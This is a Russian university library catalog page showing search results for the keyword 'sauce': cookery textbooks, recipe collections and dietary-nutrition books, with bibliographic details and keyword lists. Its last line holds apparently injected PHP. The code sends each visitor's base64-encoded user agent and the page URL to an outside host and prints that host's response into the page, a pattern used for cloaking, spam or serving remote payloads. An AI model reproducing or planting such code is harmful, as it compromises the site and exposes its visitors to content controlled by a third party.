Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

52 пользователей


Зарегистрированных: 1 

Александров Алексей Анатольевич


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СОУС")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 89
1. 
Большая энциклопедия дома и семьи. В 2 т. Т.1. Семья. Жилище. Ребенок. Питание. Здоровье, спорт, отдых. Одежда, обувь, индивидуальный стиль [Текст] : энциклопедия, 2000. - 479 с.
2. 
Калашников, Александр Юрьевич. Кафе, бары и рестораны [Текст] : производственно-практическое издание / А. Ю. Калашников, 2005. - 384 с.
3. 
Маслов, Леонид Александрович. Кулинария [Текст] : учеб. для ПТУ / Л. А. Маслов ; дар. В. Д. Полежаев, 1971. - 310, [1] с.
Держатели документа (Информация об экземплярах) 
4. 
Картофель: вкусно, питательно, разнообразно [Текст] : (600 блюд из нар. кухни) / сост.: Л. Г. Бобров, Л. Н. Терехина ; дар. О. И. Андрюшина, 1977. - 188, [2] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
5. 
Анфимова Н. А. Кулинария [Текст] : Учеб. для учрежд. нач. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 2002. - 324 с.
Держатели документа (Информация об экземплярах) 
6. 
Сборник рецептур блюд и кулинарных изделий [Текст] : Для предприятий обществ. питания / Авт.-сост. : А. И. Здобнов, В. А. Цыганенко, М. И. Пересичный, 2002. - 656 с.
Держатели документа (Информация об экземплярах) 
7. 
Анфимова Н. А. Кулинария [Текст] : Учеб. для учреждений нач. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 1998. - 324 с.
Держатели документа (Информация об экземплярах) 
8. 
Анфимова Н. А. Кулинария [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 2002. - 325 с.
9. 
Экспресс-курс повара [Текст] : учебное пособие / Авт.-сост. В. Полякова, 2002. - 447 с.
Держатели документа (Информация об экземплярах) 
10. 
Кощеев, Александр Аркадьевич. Грибы на столе [Текст] / А. А. Кощеев, 1991. - 31 с.
Держатели документа (Информация об экземплярах) 
11. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
12. 
Похлебкин, Вильям Васильевич. Национальные кухни наших народов [Текст] / В. В. Похлебкин, 2001. - 638, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
13. 
Маслов, Леонид Александрович. Кулинария [Текст] : Учеб. / Л. А. Маслов, 1957. - 295 с.
Держатели документа (Информация об экземплярах) 
14. 
Сборник рецептур блюд и кулинарных изделий [Текст] : Норматив. док. для предприятий обществ. питания / А. В. Румянцев, 1998. - 863 с.
Держатели документа (Информация об экземплярах) 
15. 
Фурс, Иван Николаевич. Технология производства продукции общественного питания [Текст] : Учеб. пособие для вузов по специальности "Коммерческая деятельность" / И. Н. Фурс, 2002. - 798 с.
Держатели документа (Информация об экземплярах) 

Данный курс является комплексной дисциплиной, включающей физиологические основы рационального питания, основы гигиены и санитарии, общие представления о технологии производства продуктов питания, технологии обработки сырья и приготовления полуфабрикатов. Рассмотрены вопросы контроля качества, товароведения продовольственных товаров, экономики общественного питания, организации производства и обслуживания и др.

16. 
Шатун, Любовь Григорьевна. Технология приготовления пищи [Текст] : учеб. / Л. Г. Шатун, 2006. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Учебник соответствует государственному общеобразовательному стандарту и дает необходимые представления по теории <механической> и <тепловой> обработки <продуктов>, расчетам сырья и <потерь> при обработке, технологии приготовления пищи с демонстрацией технологических карт и схем. ПРиведены многочисленные <кулинарные> <рецепты>.

Даны рекомендации по работе с нормативно-технологической документацией, составлению <меню>, <лечебному> <питанию>.

Для контроля знаний предложены контрольные измерители.

17. 
Завистовска, Зофья. Диетическое питание при различных заболеваниях [Текст] / З. Завистовска, 1992. - 221, [1] с.
Ключевые слова 
ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА ПИТАНИЯ -- ПИТАНИЕ ЗДОРОВОЕ -- БЕЛКИ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- САХАРИДЫ - ПИТАНИЕ -- ЖИРЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАНИЕ -- ВОДА - ПИТАНИЕ -- ВИТАМИНЫ- ПИТАНИЕ -- МЕНЮ ДИЕТИЧЕСКОЕ -- ДИЕТА ЛЕЧЕБНАЯ -- ДИЕТА ЛЕГКОУСВОЯЕМАЯ -- БОЛЕЗНЬ ЖЕЛУДКА - ПИТАНИЕ -- БОЛЕЗНЬ КИШЕЧНИКА - ПИТАНИЕ -- БОЛЕЗНЬ ПЕЧЕНИ - ПИТАНИЕ -- ДИАБЕТ САХАРНЫЙ - ПИТАНИЕ -- ОЖИРЕНИЕ - ПИТАНИЕ -- БОЛЕЗНЬ СЕРДЦА - ПИТАНИЕ -- БОЛЕЗНЬ ПОЧЕК - ПИТАНИЕ -- ТЕМПЕРАТУРА ВЫСОКАЯ - ПИТАНИЕ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ КОРМЯЩИХ МАТЕРЕЙ -- СУПЫ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ОВОЩИ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МУЧНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ КРУП - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ ЯИЦ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МЯСНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА РЫБНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- СОУС - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА СЛАДКИЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ ДИЕТИЧЕСКИЕ -- НАПИТКИ - ПИТАНИЕ ЛЕЧЕБНОЕ
18. 
Чудеса в микроволновой печи [Текст] : рецепты и полез. советы для кулинара / сост. О. В. Крылова, 1994. - 286, [2] с.
19. 
Романова, Татьяна Викторовна. Приятного аппетита! [Текст] / Т. В. Романова, 1990. - 199, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
20. 
Эткер Соусы [Текст] : Пер. с нем. / Эткер, 1994. - 92 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2901 - 20.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.95 с.12 запросов, 0.73c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;